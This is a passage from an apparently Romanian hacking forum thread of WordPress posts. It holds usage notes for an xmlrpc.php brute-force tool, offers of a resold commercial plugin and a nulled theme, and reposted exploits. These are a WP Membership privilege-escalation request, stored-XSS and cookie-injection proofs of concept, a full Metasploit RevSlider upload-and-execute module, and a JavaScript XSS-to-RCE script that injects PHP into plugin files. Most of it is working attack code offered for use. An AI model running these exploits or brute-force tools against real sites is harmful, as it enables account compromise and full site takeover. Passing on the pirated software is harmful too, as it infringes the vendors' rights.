o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log. Usage: ./checker <IPs file> <threads> Pentru a incepe brute faceti o lista de useri, una de parole si porniti: ./brute out.log users.txt passwords.txt <threads> Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400. Astept sugestii
  18. WPTouch (Enterprise Version) A complete mobile solution for wordpress. http://www.wptouch.com/pricing/ ENTERPRISE $349 Supported WordPress Sites Unlimited scriptul are updating 1 an. fara updating e pe viata. 100 euro . paypal/btc astept pm.
  19. # Exploit Title: WordPress WP Membership plugin [Privilege escalation] # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://wpmembership.e-plugins.com/ # Software Link: http://codecanyon.net/item/wp-membership/10066554 # Version: 1.2.3 # Tested on: WordPress 4.2.2 # CVE: CVE-2015-4038 1 Description Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website. 2 Proof of Concept * Login as regular user * Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator` 3 Actions taken after discovery Vendor was informed on 2015/05/19. 4 Solution No official solution yet exists. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpmembership-escalate.txt
  20. Advisory ID: HTB23257 Product: WP Photo Album Plus WordPress Plugin Vendor: J.N. Breetvelt Vulnerable Version(s): 6.1.2 and probably prior Tested Version: 6.1.2 Advisory Publication: April 29, 2015 [without technical details] Vendor Notification: April 29, 2015 Vendor Patch: April 29, 2015 Public Disclosure: May 20, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-3647 Risk Level: Medium CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered stored XSS vulnerability in WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of vulnerable WordPress installation. An attacker might be able to hijack administrator’s session and obtain full control over the vulnerable website. The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a comment. A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in administrator’s browser in context of the vulnerable website, when administrator views images or comments in administrative interface. A simple exploit below will store JS code in the WP database and display a JS popup window with "ImmuniWeb" word every time the administrator views comments or images: <form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main"> <input type="hidden" name="action" value='wppa'> <input type="hidden" name="wppa-action" value='do-comment'> <input type="hidden" name="photo-id" value='2'> <input type="hidden" name="comment" value='1'> <input type="hidden" name="moccur" value='1'> <input type="hidden" name="comemail" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="hidden" name="comname" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="submit" id="btn"> </form> The code will be automatically executed, when the administrator visits one of the following pages: http://[host]/wp-admin/admin.php?page=wppa_manage_comments http://[host]/wp-admin/admin.php?page=wppa_moderate_photos ----------------------------------------------------------------------------------------------- Solution: Update to WP Photo Album Plus 6.1.3 More Information: https://wordpress.org/plugins/wp-photo-album-plus/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin. [2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpphotoalbumplus612-xss.txt
  21. Download nulled Expression WordPress Theme, best suited for photographers and creatives who use portfolios to effectively present their work. Downloadable Expression Photography Responsive WordPress Theme is powered by the advanced Pexeto Panel, which provides tons of options to manage and modify any aspect of the theme. With all the styling options provided you can easily customize the appearance of the theme and build you own custom skin. Download
  22. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end Source
  23. Advisory ID: HTB23255 Product: eShop WordPress plugin Vendor: Rich Pedley Vulnerable Version(s): 6.3.11 and probably prior Tested Version: 6.3.11 Advisory Publication: April 15, 2015 [without technical details] Vendor Notification: April 15, 2015 Public Disclosure: May 6, 2015 Vulnerability Type: Code Injection [CWE-94] CVE Reference: CVE-2015-3421 Risk Level: Medium CVSSv2 Base Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered security vulnerability in eShop WordPress Plugin, which can be exploited by remote attacker to overwrite arbitrary PHP variables within the context of the vulnerable application. The vulnerability exists due to insufficient validation of user-supplied input in "eshopcart" HTTP cookie. Successful exploitation of this vulnerability may potentially result in arbitrary PHP code execution (RCE). Often such type of vulnerabilities lead to RCE, however in this case we can only overwrite string variables within the scope of 'eshop_checkout()' function in '/wp-content/plugins/eshop/checkout.php' file. This reduces our current vectors of exploitation to Full Path Disclosure and Cross-Site Scripting. Below is a simple PoC that overwrites contents of the "wpdb" PHP variable, which causes an error in code and discloses full installation path: GET /shopping-cart-2/checkout/ HTTP/1.1 Cookie: eshopcart=wpdb%3d1%7C; Another PoC triggers the XSS vector and executes JS pop-up box displaying "ImmuniWeb": GET /shopping-cart-2/checkout/ HTTP/1.1 Cookie: eshopcart=phone%3dsdfg'"><script>alert(/ImmuniWeb/)</script> ----------------------------------------------------------------------------------------------- Solution: Disclosure timeline: 2015-04-15 Vendor Alerted via contact form and thread in support forum, no reply. 2015-04-29 Vendor Alerted via contact form and emails, no reply. 2015-05-05 Fix Requested via contact form and emails, no reply. 2015-05-06 Public disclosure. Currently we are not aware of any official solution for this vulnerability. ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23255 - https://www.htbridge.com/advisory/HTB23255 - Arbitrary Variable Overwrite in eShop WordPress Plugin. [2] eShop WordPress Plugin - http://quirm.net/ - eShop is an accessible shopping cart plugin for WordPress, packed with various features. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source
  24. Exploit that uses a WordPress cross site scripting flaw to execute code as the administrator. /* Author: @evex_1337 Title: Wordpress XSS to RCE Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After The Being Triggered With Administrator Previliged User. ¯\_(?)_/¯ Reference: [url]http://research.evex.pw/?vuln=14[/url] Enjoy. */ //Installed Plugins Page plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php'; //Inject "XSS" Div jQuery('body').append('<div id="xss" ></div>'); xss_div = jQuery('#xss'); xss_div.hide(); //Get Installed Plugins Page Source and Append it to "XSS" Div jQuery.ajax({ url: plugins, type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); } }); //Put All Plugins Edit URL in Array plugins_edit = [ ]; xss_div.find('a').each(function () { if (jQuery(this).attr('href').indexOf('?file=') != - 1) { plugins_edit.push(jQuery(this).attr('href')); } }); //Inject Payload for (var i = 0; i < plugins_edit.length; i++) { jQuery.ajax({ url: plugins_edit[i], type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); _wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"') [1]; old_code = jQuery('form#template div textarea#newcontent') [0].value; payload = '<?php phpinfo(); ?>'; new_code = payload + '\n' + old_code; file = plugins_edit[i].split('file=') [1]; jQuery.ajax({ url: plugins_edit[i], type: 'POST', data: { '_wpnonce': _wpnonce, 'newcontent': new_code, 'action': 'update', 'file': file, 'submit': 'Update File' }, async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); if (jQuery('form#template div textarea#newcontent') [0].value.indexOf(payload) != - 1) { // Passed, this is up to you ( skiddies Filter ) injected_file = window.location.href.split('wp-admin') [0] + '/wp-content/plugins/' + file; // [url]http://localhost/wp//wp-content/plugins/504-redirects/redirects.php[/url] throw new Error(''); } } }); } }); } Source : WordPress 4.2.1 XSS / Code Execution
×
×
  • Create New...